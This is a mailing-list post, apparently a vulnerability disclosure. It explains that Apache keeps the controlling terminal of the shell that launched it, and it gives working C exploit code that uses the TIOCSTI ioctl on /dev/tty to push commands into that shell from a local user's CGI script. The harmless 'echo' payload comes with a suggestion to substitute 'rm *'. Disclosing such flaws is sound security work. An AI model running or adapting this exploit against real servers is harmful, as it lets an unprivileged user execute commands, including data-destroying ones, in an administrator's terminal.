Yes, Apache closes fds 0,1 and 2 (well, reopens them to /dev/null) , but
retains the controlling tty - this can be accessed via opening /dev/tty . The
controlling tty is a process property that is separate from the fds it has
open, and allows certain ioctl powers on any fd matching that. A 'ps' listing
will show the controlling tty of each process - you'll notice that most servers
have '?', but apache will have something of the form 'pts/n' or 'ttyn' so long
as the shell that spawned it is still open. This is the sample exploit code;
#include <fcntl.h>
#include <assert.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/types.h>
#include <unistd.h>
int main(char** args,int argc)
{
const char* fake = "echo lol you got owned\n";
const char* fake_ptr = fake;
int pts = open("/dev/tty",O_RDONLY);
while(*fake_ptr != '\0')
{
ioctl(pts,TIOCSTI,fake_ptr);
fake_ptr++;
}
return 0;
}
Install it as a local user's CGI (I've verified this under suexec at least),
and have the webserver run it. If the shell that ran the apache init script is
still open, it will actually execute the command and echo out "lol you got
owned". Substitute this for rm * as you see fit.
Richard
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
